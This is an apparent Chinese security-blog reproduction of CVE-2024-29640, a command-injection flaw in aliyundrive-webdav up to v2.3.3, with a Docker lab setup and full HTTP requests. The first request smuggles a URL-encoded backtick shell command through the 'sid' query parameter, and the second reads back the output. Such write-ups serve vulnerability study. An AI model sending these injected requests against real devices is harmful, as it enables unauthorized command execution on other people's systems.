CVE-2024-29640

admin

139018
文章

114
评论

2024年5月17日18:02:48评论53 views字数 2008阅读6分41秒阅读模式

免责申明：本文内容为学习笔记分享，仅供技术学习参考，请勿用作违法用途，任何个人和组织利用此文所提供的信息而造成的直接或间接后果和损失，均由使用者本人负责，与作者无关！！！

—

漏洞名称

aliyundrive-webdav 命令注入漏洞

—

漏洞影响

aliyundrive-webdav v.2.3.3及以下版本

开源地址

https://github.com/messense/aliyundrive-webdav

—

漏洞描述

阿里云盘 WebDAV 服务，主要使用场景为配合支持 WebDAV 协议的客户端 App 如 Infuse、nPlayer 等实现在电视上直接观看云盘视频内容，支持客户端 App 直接从阿里云盘获取文件播放而不经过运行本应用的服务器中转, 支持上传文件，但受限于 WebDAV 协议不支持文件秒传。该系统v.2.3.3及以下版本存在漏洞，容易受到命令注入攻击。

—

搭建靶场

docker run -d --name=aliyundrive-webdav --restart=unless-stopped -p 8080:8080   -v /etc/aliyundrive-webdav/:/etc/aliyundrive-webdav/   -e REFRESH_TOKEN='your refresh token'   -e WEBDAV_AUTH_USER=admin   -e WEBDAV_AUTH_PASSWORD=admin   messense/aliyundrive-webdav

CVE-2024-29640

—

漏洞复现

第一步，注入命令ls />/www/123.txt

GET /cgi-bin/luci/admin/services/aliyundrive-webdav/query?sid=%60%6c%73%20%2f%3e%2f%77%77%77%2f%31%32%33%2e%74%78%74%60 HTTP/1.1Host: 192.168.32.129Cookie: sysauth=41273cb2cffef0bb5d0653592624cf64Sec-Ch-Ua: "Chromium";v="122", "Not(A:Brand";v="24", "Microsoft Edge";v="122"Sec-Ch-Ua-Mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Edg/122.0.0.0Sec-Ch-Ua-Platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://192.168.32.129/cgi-bin/luci/admin/services/aliyundrive-webdav/clientAccept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6Connection: close

CVE-2024-29640

第二步，查看文件

GET /123.txt HTTP/1.1Host: 192.168.32.129Cookie: sysauth=41273cb2cffef0bb5d0653592624cf64Sec-Ch-Ua: "Chromium";v="122", "Not(A:Brand";v="24", "Microsoft Edge";v="122"Sec-Ch-Ua-Mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Edg/122.0.0.0Sec-Ch-Ua-Platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://192.168.32.129/cgi-bin/luci/admin/services/aliyundrive-webdav/clientAccept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6Connection: close

CVE-2024-29640

漏洞复现成功

—

修复建议

升级到最新版本。

原文始发于微信公众号（AI与网安）：CVE-2024-29640

免责声明:文章中涉及的程序(方法)可能带有攻击性，仅供安全研究与教学之用，读者将其信息做其他用途，由读者承担全部法律及连带责任，本站不承担任何法律及连带责任；如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截，联系方式见首页)，望知悉。

左青龙
微信扫一扫

右白虎
微信扫一扫

CVE-2024-29640

漏洞预警锐X eweb ipam.php 文件读取漏洞

UNA CMS <= 14.0.0（PHP反序列化）命令执行漏洞

亿华考勤软件 default.aspx 任意文件上传漏洞

红帆HFOffice SQL注入漏洞

三星路由器WLAN-AP-WEA453e-未授权RCE等多个漏洞

UNACMS PHP对象注入漏洞(CVE-2025-32101)

MRCMS（蘑菇建站）跨站脚本漏洞及解决方法（CNVD-2025-05252、CVE-2025-2195）

【风险通告】PyTorch存在远程代码执行漏洞（CVE-2025-32434）

PyTorch 中存在严重的RCE漏洞

CVE-2025-22457：基于堆栈的远程缓冲区溢出的POC验证脚本

发表评论